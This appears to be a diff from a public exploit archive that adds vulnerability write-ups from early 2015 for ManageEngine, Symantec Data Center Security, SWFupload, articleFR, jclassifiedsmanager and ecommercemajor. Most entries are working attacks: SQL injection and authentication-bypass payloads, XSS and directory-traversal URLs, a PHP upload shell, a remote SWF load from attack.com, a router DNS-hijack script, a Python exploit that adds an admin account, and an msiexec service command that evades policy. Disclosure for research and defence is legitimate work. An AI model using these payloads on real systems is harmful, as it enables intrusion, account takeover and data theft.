echo " Error : libwww-perl not found =/"
exit;
fi
GET "http://$1/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=$2&dnsSecondary=$3" 0&> /dev/null <&1

89
platforms/jsp/webapps/35890.txt Executable file
View file

@ -0,0 +1,89 @@
================================================================================
[REWTERZ-20140101] - Rewterz - Security Advisory
================================================================================
Title: ManageEngine ServiceDesk SQL Injection Vulnerability
Product: ServiceDesk Plus (http://www.manageengine.com/)
Affected Version: 9.0 (Other versions could also be affected)
Fixed Version: 9.0 Build 9031
Vulnerability Impact: High
Advisory ID: REWTERZ-20140101
Published Date: 22-Jan-2015
Researcher: Muhammad Ahmed Siddiqui
Email: ahmed [at] rewterz.com
URL: http://www.rewterz.com/vulnerabilities/manageengine-servicedesk-sql-injection-vulnerability
================================================================================
Product Introduction
================
ServiceDesk Plus is a help desk software with integrated asset and
project management built on the ITIL framework. It is available in 29
different languages and is used by more than 85,000 companies, across
186 countries, to manage their IT help desk and assets.
Source: http://www.manageengine.com/products/service-desk/
Vulnerability Information
==================
Class: SQL Injection Vulnerability
Impact: An Authenticated user could exploit this vulnerability to gain
complete system access.
Remotely Exploitable: Yes
Authentication Required: Yes
User interaction required: Yes
CVE Name: N/A
Vulnerability Description
==================
CreateReportTable.jsp page is prone to SQL injection via site
variable. A user with limited privileges could exploit this
vulnerability to gain complete database/system access.
Proof-of-Concept
=============
Postgres DB:
http://127.0.0.1:8080/reports/CreateReportTable.jsp?site=0 AND
3133=(SELECT 3133 FROM PG_SLEEP(1))
MySQL DB:
http://127.0.0.1:8080/reports/CreateReportTable.jsp?site=0 AND UNION
ALL SELECT user(),NULL,NULL,NULL,NULL
Timeline
======
23-Dec-2014 Notification to Vendor
24-Dec-2014 Response from Vendor
30-Dec-2014 Vulnerability fixed by Vendor
About Rewterz
===========
Rewterz is a boutique Information Security company, committed to
consistently providing world class professional security services. Our
strategy revolves around the need to provide round-the-clock quality
information security services and solutions to our customers. We
maintain this standard through our highly skilled and professional
team, and custom-designed, customer-centric services and products.
http://www.rewterz.com
Complete list of vulnerability advisories published by Rewterz:
http://www.rewterz.com/resources/security-advisories

101
platforms/jsp/webapps/35891.txt Executable file
View file

@ -0,0 +1,101 @@
================================================================================
[REWTERZ-20140102] - Rewterz - Security Advisory
================================================================================
Title: ManageEngine ServiceDesk Plus User Enumeration Vulnerability
Product: ServiceDesk Plus (http://www.manageengine.com/)
Affected Version: 9.0 (Other versions could also be affected)
Fixed Version: 9.0 Build 9031
Vulnerability Impact: Low
Advisory ID: REWTERZ-20140102
Published Date: 22-Jan-2015
Researcher: Muhammad Ahmed Siddiqui
Email: ahmed [at] rewterz.com
URL: http://www.rewterz.com/vulnerabilities/manageengine-servicedesk-plus-user-enumeration-vulnerability
================================================================================
Product Introduction
===============
ServiceDesk Plus is a help desk software with integrated asset and
project management built on the ITIL framework. It is available in 29
different languages and is used by more than 85,000 companies, across
186 countries, to manage their IT help desk and assets.
Source: http://www.manageengine.com/products/service-desk/
Vulnerability Information
==================
Class: User Name Enumeration
Impact: An unauthenticated and authenticated user can enumerate users
Remotely Exploitable: Yes
Authentication Required: Yes
User interaction required: Yes
CVE Name: N/A
Vulnerability Description
===================
An unauthenticated and authenticated user can enumerate all the users
and domains on the system by sending a simple request to URL.
Proof-of-Concept Authenticated User
============================
An attacker can use the following URL to enumerate users and domains
by accessing the following URL:
http:// 127.0.0.1:8080/servlet/AJaxServlet?action=checkUser&search=guest
Response if User is valid:
{ USER_PRESENT: 'true', IN_SITE: 'true' }
Response if User is invalid:
{ USER_PRESENT: 'false', ADD_REQUESTER: 'false' }
Proof-of-Concept Unauthenticated User
==============================
An attacker can use the following URL to enumerate users and domains
by accessing the following URL:
http://127.0.0.1:8080/domainServlet/AJaxDomainServlet?action=searchLocalAuthDomain&search=100101
If the user in the Search Parameter is found the response will contain
the domain name in which that particular user exists.
Timeline
=======
23-Dec-2014 Notification to Vendor
24-Dec-2014 Response from Vendor
30-Dec-2014 Vulnerability fixed by Vendor
About Rewterz
============
Rewterz is a boutique Information Security company, committed to
consistently providing world class professional security services. Our
strategy revolves around the need to provide round-the-clock quality
information security services and solutions to our customers. We
maintain this standard through our highly skilled and professional
team, and custom-designed, customer-centric services and products.
http://www.rewterz.com
Complete list of vulnerability advisories published by Rewterz:
http://www.rewterz.com/resources/security-advisories

87
platforms/jsp/webapps/35904.txt Executable file
View file

@ -0,0 +1,87 @@
================================================================================
[REWTERZ-20140103] - Rewterz - Security Advisory
================================================================================
Title: ManageEngine ServiceDesk Plus User Privileges Management Vulnerability
Product: ServiceDesk Plus (http://www.manageengine.com/)
Affected Version: 9.0 (Other versions could also be affected)
Fixed Version: 9.0 Build 9031
Vulnerability Impact: Low
Advisory ID: REWTERZ-20140103
Published Date: 22-Jan-2015
Researcher: Muhammad Ahmed Siddiqui
Email: ahmed [at] rewterz.com
URL: http://www.rewterz.com/vulnerabilities/manageengine-servicedesk-plus-user-privileges-management-vulnerability
================================================================================
Product Introduction
===============
ServiceDesk Plus is a help desk software with integrated asset and
project management built on the ITIL framework. It is available in 29
different languages and is used by more than 85,000 companies, across
186 countries, to manage their IT help desk and assets.
Source: http://www.manageengine.com/products/service-desk/
Vulnerability Information
===================
Class: Improper Privilege Management
Impact: Low privileged user can access application data
Remotely Exploitable: Yes
Authentication Required: Yes
User interaction required: Yes
CVE Name: N/A
Vulnerability Description
==================
A user with limited privileges could gain access to certain
functionality that is available only to administrative users. For
example, users with Guest privileges can see the subjects of the
tickets, stats and other information related to tickets.
Proof-of-Concept
=============
http://127.0.0.1:8080/servlet/AJaxServlet?action=getTicketData&search=dateCrit
http://127.0.0.1:8080/swf/flashreport.swf
http://127.0.0.1:8080/reports/flash/details.jsp?group=Site
http://127.0.0.1:8080/reports/CreateReportTable.jsp?site=0
Timeline
======
23-Dec-2014 Notification to Vendor
24-Dec-2014 Response from Vendor
30-Dec-2014 Vulnerability fixed by Vendor
About Rewterz
===========
Rewterz is a boutique Information Security company, committed to
consistently providing world class professional security services. Our
strategy revolves around the need to provide round-the-clock quality
information security services and solutions to our customers. We
maintain this standard through our highly skilled and professional
team, and custom-designed, customer-centric services and products.
http://www.rewterz.com
Complete list of vulnerability advisories published by Rewterz:
http://www.rewterz.com/resources/security-advisories

57
platforms/jsp/webapps/35910.txt Executable file
View file

@ -0,0 +1,57 @@
################################################################################################
# #
# ...:::::ManageEngine EventLog Analyzer Directory Traversal/XSS Vulnerabilities::::.... #
# #############################################################################################
Sobhan System Network & Security Group (sobhansys)
-------------------------------------------------------
# Date: 2015-01-24
# Exploit Author: AmirHadi Yazdani (Sobhansys Co)
# Vendor Homepage: http://www.manageengine.com/products/eventlog/
# Demo Link: http://demo.eventloganalyzer.com/event/index3.do
#Affected version: <= Build Version : 9.0
About ManageEngine EventLog Analyzer (From Vendor Site) :
EventLog Analyzer provides the most cost-effective Security Information and Event Management (SIEM) software on the market.
Using this Log Analyzer software, organizations can automate
the entire process of managing terabytes of machine generated logs by collecting, analyzing, correlating, searching, reporting,
and archiving from one central location.
This event log analyzer software helps to monitor file integrity, conduct log forensics analysis,
monitor privileged users and comply to different compliance regulatory bodies
by intelligently analyzing your logs and instantly generating a variety of reports like user activity reports, historical trend reports, and more.
--------------------------------------------------------
I'M hadihadi From Virangar Security Team
special tnx to:MR.nosrati,black.shadowes,MR.hesy
& all virangar members & all hackerz
greetz to My friends In Signal IT Group (www.signal-net.net) & A.Molaei
spl:Z.Khodaee
-------
exploit:
Diretory Traversal :
http://127.0.0.1/event/index2.do?helpP=userReport&overview=true&tab=report&url=../../WEB-INF/web.xml%3f
http://127.0.0.1/event/index2.do?completeData=true&helpP=archiveAction&tab=system&url=../../WEB-INF/web.xml%3f
http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13&tab=system&url=../../WEB-INF/web.xml%3f
XSS :
http://127.0.0.1/event/index2.do?helpP=userReport&overview=true&tab=report&url=userReport'%22()%26%25<ahy><ScRiPt%20>prompt(915375)</ScRiPt>
http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13'%22()%26%25<ahy><ScRiPt%20>prompt(978138)</ScRiPt>&tab=system&url=ConfigureTemplate
----
Sobhan system Co.
Signal Network And Security Group (www.signal-net.net)
E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net

View file

@ -0,0 +1,58 @@
# Exploit Title: SWFupload All Version XSF Vulnerability
# Date: 25/01/2014
# Exploit Author: MindCracker - Team MaDLeeTs
# Contact : MindCrackerKhan@Gmail.com - Maddy@live.com.pk | https://twitter.com/MindCrackerKhan
# Verion : All
# Tested on: Linux / Window
#Description :
XSF occurs when an SWF have permission/able to load another file from another directory or site.The vulnerable
swf can be exploited by just loading swf/img/any ( like Phishing or Cross-Site scripting
#Vulnerable Code :
ExternalInterface.addCallback("SetButtonTextStyle",this.SetButtonTextStyle);
this.SetButtonTextStyle(String(root.loaderInfo.parameters.buttonTextStyle));
}
catch(ex:Object)
{
this.SetButtonTextStyle("");
}
try
{
As you can see the .buttonTextStyle variable is not well configured ( by exactly adding the value ) and This ButtonTextStyle will accept any value
The vulneralbe SWF will load any file
http://victim.com/buttontextstyle.swf?buttonTextStyle=http://attack.com/Exploiting.swf
2.
ExternalInterface.addCallback("SetButtonText",this.SetButtonText);
SetButtonText
{
this.SetButtonText(String(root.loaderInfo.parameters.buttonText));
}
catch(ex:Object)
{
this.SetButtonText("");
}
try
{
#POC
http://victim.com/swfupload.swf?buttonTextStyle=http://attack.com/Exploiting.swf

View file

@ -0,0 +1,30 @@
# Exploit Title: jclassifiedsmanager Multiple Vulnerabilities
# Google Dork: inurl:com_jclassifiedsmanager
# Date: 26 Jan 2015
# Exploit Author: Sarath Nair aka AceNeon13
# Contact: @AceNeon13
# Greetings: HariKrishnan, Raj3sh.tv, Deepu.tv
# Vendor Homepage: cmsjunkie.com
# Software Link: http://www.cmsjunkie.com/classifieds-manager
# PoC Exploit: SQL Injection
--------------------------------
http://localhost/jclassifiedsmanager/classifieds/offerring-ads?controller=displayads&view=displayads&task=viewad&id=[SQL Injection Here]
"id" parameter is not sanitized.
# PoC Exploit: XSS Reflected
--------------------------------
http://localhost/jclassifiedsmanager/classifieds?view=displayads7ed3b"onload%3d"alert(1)"87d4d&layout=offerring&controller=displayads&adtype=1
"view" parameter is not sanitized.
########################################
# Vulnerability Disclosure Timeline:
2014-Dec-11: Discovered vulnerability
2014-Dec-12: Vendor Notification
2014-Dec-12: Vendor Response/Feedback
2015-Jan-19: Vendor Fix/Patch
2015-Jan-26: Public Disclosure
#######################################

View file

@ -0,0 +1,311 @@
SEC Consult Vulnerability Lab Security Advisory < 20150122-0 >
=======================================================================
title: Multiple critical vulnerabilities
products: Symantec Data Center Security: Server Advanced (SDCS:SA)
Symantec Critical System Protection (SCSP)
vulnerable version: see: Vulnerable / tested versions
fixed version: SCSP 5.2.9 MP6, SDCS:SA 6.0 MP1 - not all
vulnerabilities were fixed, but mitigations exist
impact: Critical
CVE number: CVE-2014-7289, CVE-2014-9224, CVE-2014-9225, CVE-2014-9226
homepage: http://www.symantec.com
found: 2014-09-19
by: Stefan Viehböck
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Symantec Data Center Security: Server Advanced v6.0 (DCS: Server Advanced)
extends the Data Center Security: Server solution beyond agentless threat
protections by incorporating technologies previous known as Critical System
Protection. Data Center Security: Server Advanced provides granular, policy-
based controls with a low impact in-guest agent to monitor and protect numerous
physical and virtual server environments. Through a combination of technologies
including application-centric controls including protected white listing,
sandboxing using least privilege access controls, host-based intrusion detection
(HIDS) and prevention (HIPS), and real-time file integrity monitoring (FIM),
organizations can proactively safeguard their heterogeneous server environments
and the information they contain from zero-day and targeted attacks, and fulfill
their compliance mandates across critical systems. Click here for more info"
Source:
http://www.symantec.com/connect/forums/announcing-data-center-security-server-server-advanced-products
Business recommendation:
------------------------
Attackers are able to completely compromise the SDCS:SA Server as they can gain
access at the system and database level. Furthermore attackers can manage all
clients and their policies.
SDCS:SA Server can be used as an entry point into the target infrastructure
(lateral movement, privilege escalation).
Furthermore the SDCS:SA Client protections can be bypassed in several ways.
It is highly recommended by SEC Consult not to use this software until a
thorough security review (SDCS:SA Server, SDCS:SA Client Policies) has been
performed by security professionals and all identified issues have been
resolved.
Note: SDCS:SA was replaced by SCSP. In this document the name SDCS:SA is used.
Vulnerability overview/description:
-----------------------------------
1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)
Due to insufficient input validation, the application allows the injection
of direct SQL commands. By exploiting the vulnerability, an attacker gains
access (read/write) to all records stored in the database as arbitrary SQL
statements can be executed.
Furthermore the application design enables an attacker to gain code execution
as SYSTEM (highest privilege Windows user) on the server by exploiting this
vulnerability.
No prior authentication is needed to exploit this vulnerability.
Affected script:
https://<host>:4443/sis-ui/authenticate
2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)
The applications suffers from a reflected cross-site scripting vulnerability,
which allows an attacker to steal other users' sessions, to impersonate other
users and to gain unauthorized access to the admin interface.
Affected scripts:
https://<host>:8081/webui/Khaki_docs/SSO-Error.jsp
https://<host>:8081/webui/admin/WCUnsupportedClass.jsp
3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)
A script discloses internal information about the application on the server
without prior authentication. This information includes file paths on the
webserver, version information (OS, Java) and is accessible without prior
authentication.
Affected script:
https://<host>:8081/webui/admin/environment.jsp
4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client)
(CVE-2014-9226)
Several bypasses were discovered. These require Windows Administrator
permissions. This requirement is usually met in SDCS:SA deployments.
Note: SEC Consult did not check whether the mitigations provided by Symantec do
in fact sufficiently mitigate these vulnerabilities!
- Persistent code execution via Windows Services
The default Symantec policy rules can be bypassed in order to get persistent
arbitrary code execution.
- Remote code execution via RPC
The default Symantec policy rules can be bypassed in order to get persistent
arbitrary code execution. In addition to that "psexec-style" remote code
execution via SMB is possible as well.
- Policy bypass: Extraction of Windows passwords/hashes
The default Symantec policy rules do not prevent attackers from extracting
the Windows passwords/password hashes from the System.
- Privilege elevation via Windows Installer (msiexec.exe)
The restrictions imposed by the default policies can be bypassed entirely by
exploiting incorrect assumptions made in the policy regarding the Windows
Installer (msiexec.exe).
- Privilege elevation/code execution via Windows Management Instrumentation
(.mof files)
The restrictions imposed by default policies can be bypassed partially by
exploiting incorrect assumptions made in the policy regarding the Windows
Management Instrumentation. The policy does not take intended OS functionality
to execute code into account.
Proof of concept:
-----------------
1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)
The servlet accessible via /sis-ui/authenticate (TCP port 4443, HTTPS) is
vulnerable to SQL injection. By sending a specially crafted HTTP request,
arbitrary SQL statements can be executed.
In a proof of concept exploit, SQL statements to add a new SDCS:SA user with
admin privileges (username: secconsult, password: PASSWORD123!) were executed.
These statements are:
INSERT INTO USR (RID, USERNAME, PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL,
ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME,
MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (1504, 'secconsult',
'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=',
'', '', '', '', '', '', '', '', NULL, 'SECCONSULT', '2014-09-12 07:13:09',
'2014-09-12 07:13:23', '1', '0', '0',
'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');
INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1504, 1);
The code used to exploit the SQL injection vulnerability is listed below:
import httplib
def send_request(host,data):
params = data
headers = {"AppFire-Format-Version": "1.0",
"AppFire-Charset": "UTF-16LE",
"Content-Type":"application/x-appfire",
"User-Agent":"Java/1.7.0_45",
}
conn = httplib.HTTPSConnection(host)
conn.request("POST", "/sis-ui/authenticate", params, headers)
response = conn.getresponse()
data=response.read()
conn.close()
return response,data
header ="Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n"
data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME,
PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO,
PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT)
VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '',
'', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12
07:13:23', '1', '0', '0',
'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');
-- '' " # add user to USR table
#data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID,
ROLERID) VALUES (1504, 1); -- " # add user to admin group
data+="\r\nan=Symantec Data Center Security Server
6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg=\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n"
data = data.encode('utf-16le')
eof_flag="\nEOF_FLAG\n"
header = header %(len(data))
payload=header+data+eof_flag
response,data = send_request("<host>:4443",payload)
print data.decode('utf-16le')
print response.status
As the application users act as Tomcat administrators, an attacker can login
into the Tomcat manager as well. The Tomcat manager is available by default
via TCP port 8081 HTTPS.
The Tomcat Web Application Manager can be used to deploy new .war-files
containing attacker-controlled Java code. This allows an attacker to execute
arbitrary commands on the operating system with the permissions/user of the
"Symantec Data Center Security Server Manager" service (SISManager) which are
SYSTEM.
2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)
At least the following URLs are vulnerable to XSS:
https://example.com:8081/webui/Khaki_docs/SSO-Error.jsp?ErrorMsg=<script>alert('xss')</script>
https://example.com:8081/webui/admin/WCUnsupportedClass.jsp?classname=<script>alert('xss')</script>
3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)
The following URLs discloses internal information:
https://example.com:8081/webui/admin/environment.jsp
4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client)
(CVE-2014-9226)
- Persistent code execution via Windows Services
Windows Service binaries can have file extensions other than ".exe". This
allows an attacker to execute arbitrary files and enables automatic execution
of malicious code at OS boot.
- Remote code execution via RPC
Existing tools like "psexec" or Metasploit (/exploit/windows/smb/psexec) can
be modified to write files not ending with ".exe" on the target system.
- Policy bypass: Extraction of Windows passwords/hashes
The tool "mimikatz" can be used to extract Windows credentials.
- Privilege elevation via Windows Installer (msiexec.exe)
msiexec.exe is trusted "safe privileges" when started as a service (usually
"Windows Installer" parameter "/V"). This can be abused by creating a service
that starts msiexec.exe with the parameters "/quiet", "/i" and a path to a valid
.msi file. Upon service start the .msi file is executed with "safe privileges"
privileges and not subject to any SDCS:SA Client checks.
sc create evil_service binpath= "c:\windows\System32\msiexec.exe /quiet /i
c:\temp\evil_msi" type= own start= auto error= ignore
net start evil_service
- Privilege elevation/code execution via Windows Management Instrumentation
(.mof files)
On old Windows versions .mof files placed in "%SystemRoot%\System32\wbem\mof\"
are automatically compiled/executed. These trigger arbitrary code execution.
The code is executed with "def_winsvcs_ps" permissions.
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in Symantec Data Center
Security: Server Advanced version 6.0, which was the most recent version at
the time of discovery.
However other versions (SCSP 5.2.9) are affected by the vulnerabilities as
well. See the vendor information in the Solution section.
Vendor contact timeline:
------------------------
2014-10-20: Sending advisory and proof of concept exploit via encrypted
channel.
2014-10-20: Vendor acknowledges receipt of advisory.
2014-11-18: Requesting status update.
2014-11-18: Vendor responds and informs about an advisory in December,
version containing fixes in February.
2014-12-04: Vendor informs about delays in releasing fixes/mitigations,
target release date mid-January.
2015-01-08: Vendor confirms release date for fixes/mitigations (2015-01-17).
2015-01-17: Vendor releases fixes for SCSP.
2015-01-19: Vendor releases advisory and mitigations for SCSP/
2015-01-22: SEC Consult releases coordinated security advisory.
Solution:
---------
Update to the most recent version of SCSP (5.2.9 MP6) or SDCS:SA (6.0 MP1).
Not all vulnerabilities are fixed by this update! However, Symantec has
provided mitigations for these issues:
More information can be found at:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20150119_00
http://www.symantec.com/business/support/index?page=content&id=TECH227679
http://www.symantec.com/business/support/index?page=content&id=HOWTO100996&actp=search&viewlocale=en_US&searchid=1421349750071
Workaround:
-----------
See solution.
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com
EOF Stefan Viehböck / @2015

50
platforms/php/webapps/35857.txt Executable file
View file

@ -0,0 +1,50 @@
# Exploit Title: SQL injection vulnerability in articleFR CMS 3.0.5
# Google Dork: N/A
# Date: 01/21/2015
# Exploit Author: Tran Dinh Tien (tien.d.tran@itas.vn) & ITAS Team (www.itas.vn)
# Vendor Homepage: http://freereprintables.com
# Software Link: https://github.com/articlefr/articleFR
# Version: version 3.0.5
# Tested on: Linux
# CVE : N/A
::PROOF OF CONCEPT::
- REQUEST:
POST /articlefr/register/ HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://target.org/articlefr/register/
Cookie: _ga=GA1.2.884814947.1419214773; __unam=bd22dea-14a6fcadd31-42cba495-31; GEAR=local-5422433b500446ead50002d4; PHPSESSID=8a9r8t1d5g9veogj6er9fvev63; _gat=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 103
username=[SQL INJECTION HERE]&email=test2%40itas.vn&name=test&password=123123&submit=register
- Vulnerable file: articleFR/system/profile.functions.php
- Vulnerable parameter: username
- Query: SELECT id, username, name, password, email, website, blog, date, isactive, activekey, membership FROM users WHERE username ='[Injection HERE]'
- Vulnerable function:
function getProfile($_username, $_connection) {
$_q = "SELECT id, username, name, password, email, website, blog, date, isactive, activekey, membership FROM users WHERE username = '" . $_username . "'";
$_result = single_resulti($_q, $_connection);
$_retval['id'] = $_result['id'];
$_retval['name'] = $_result['name'];
$_retval['username'] = $_result['username'];
$_retval['password'] = $_result['password'];
$_retval['email'] = $_result['email'];
$_retval['website'] = $_result['website'];
$_retval['blog'] = $_result['blog'];
$_retval['date'] = $_result['date'];
$_retval['isactive'] = $_result['isactive'];
$_retval['activekey'] = $_result['activekey'];
$_retval['membership'] = $_result['membership'];
return $_retval;
}

97
platforms/php/webapps/35858.txt Executable file
View file

@ -0,0 +1,97 @@
# Exploit Title: Arbitrary File Upload in articleFR CMS 3.0.5
# Google Dork: N/A
# Date: 01/21/2015
# Exploit Author: Tran Dinh Tien (tien.d.tran@itas.vn) & ITAS Team (www.itas.vn)
# Vendor Homepage: http://freereprintables.com
# Software Link: https://github.com/articlefr/articleFR
# Version: version 3.0.5
# Tested on: Linux
# CVE : N/A
::PROOF OF CONCEPT::
- REQUEST:
POST /articlefr/dashboard/videouploader.php HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://target.org/articlefr/dashboard/videos/fileupload/
Content-Length: 414
Content-Type: multipart/form-data; boundary=---------------------------277651700022570
Cookie: GEAR=local-5422433b500446ead50002d4; PHPSESSID=uc86lsmbm53d73d572tvvec3v4; _ga=GA1.2.884814947.1419214773; __unam=bd22dea-14a6fcadd31-42cba495-9; _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------277651700022570
Content-Disposition: form-data; name="myVideo"; filename="img.php"
Content-Type: image/gif
<?php
phpinfo();
?>
-----------------------------277651700022570
Content-Disposition: form-data; name=""
undefined
-----------------------------277651700022570
Content-Disposition: form-data; name=""
undefined
-----------------------------277651700022570--
- RESPONSE:
HTTP/1.1 200 OK
Date: Mon, 22 Dec 2014 03:10:30 GMT
Server: Apache/2.2.15 (Red Hat)
Content-Type: text/html
Vary: Accept-Encoding
Accept-Ranges: none
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 36
[String_Random].php
- Shell link: http://target.org/articlefr2/dashboard/videos/[String_Random].php
- Vulnerable file: articlefr/dashboard/videouploader.php
- Vulnerable code:
<?php
$output_dir = dirname(dirname(__FILE__)) . "/videos_repository/";
if(isset($_FILES["myVideo"]))
{
$ret = array();
$error =$_FILES["myVideo"]["error"];
if(!is_array($_FILES["myVideo"]["name"]))
{
$fileName = $_FILES["myVideo"]["name"];
$extension = pathinfo($fileName, PATHINFO_EXTENSION);
$newFileName = md5(uniqid() . $fileName) . '.' . $extension;
move_uploaded_file($_FILES["myVideo"]["tmp_name"], $output_dir.$newFileName);
$ret[]= $newFileName;
}
echo $newFileName;
}
?>
::REFERENCE::
- http://www.itas.vn/news/itas-team-phat-hien-lo-hong-arbitrarily-file-upload-trong-articlefr-cms-71.html
::DISCLAIMER::
THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.

71
platforms/php/webapps/35878.txt Executable file
View file

@ -0,0 +1,71 @@
##################################################################################################
#Exploit Title : ecommercemajor ecommerce CMS SQL Injection and Authentication bypass
#Author : Manish Kishan Tanwar
#Home page Link : https://github.com/xlinkerz/ecommerceMajor
#Date : 22/01/2015
#Discovered at : IndiShell Lab
#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti,Kishan Singh and ritu rathi
#email : manish.1046@gmail.com
##################################################################################################
////////////////////////
/// Overview:
////////////////////////
ecommercemajor is the php based CMS for ecommerce portal
///////////////////////////////
// Vulnerability Description:
///////////////////////////////
SQL injection vulnerability:-
==============================
in file product.php data from GET parameter 'productbycat' is not getting filter before passing into SQL query and hence rising SQL Injection vulnerability
---------------------
$getallproduct="select * from purchase where status='enable' and catid=$_GET[productbycat] order by id desc";
---------------------
POC
http://127.0.0.1/ecommercemajor/product.php?productbycat=SQLI
Authentication Bypass:-
==============================
file index.php under directory __admin has SQL injection vulnerability
parameter username and password suppliedin post parameter for checking valid admin username and password is not getting filter before passing into SQL query which arise authentication bypass issue.
vulnerable code is
-------------------
if(isset($_POST[login]))
{
$check="select * from adminlogin where username='$_POST[username]' and password='$_POST[username]'";
$checkresult=mysql_query($check);
$checkcount=mysql_num_rows($checkresult);
if($checkcount>0)
{
$checkrow=mysql_fetch_array($checkresult);
$_SESSION[adminname]=$checkrow[adminname];
$_SESSION[adminloginstatus]="success";
echo "<script>window.location='home.php';</script>";
}
--------------------
POC
open admin panel
http://127.0.0.1/ecommercemajor/__admin/
username: ' or '1337'='1337
password: ' or '1337'='1337
--==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Das
#############################################################################################
--==[[Love to]]==--
#Kishan Tanwar,Mrs. Ritu Rathi,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik)
--==[[ Special Fuck goes to ]]==--
<3 suriya Cyber Tyson <3

146
platforms/php/webapps/35899.txt Executable file
View file

@ -0,0 +1,146 @@
Document Title:
===============
Mangallam CMS - SQL Injection Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1421
Release Date:
=============
2015-01-26
Vulnerability Laboratory ID (VL-ID):
====================================
1421
Common Vulnerability Scoring System:
====================================
8.9
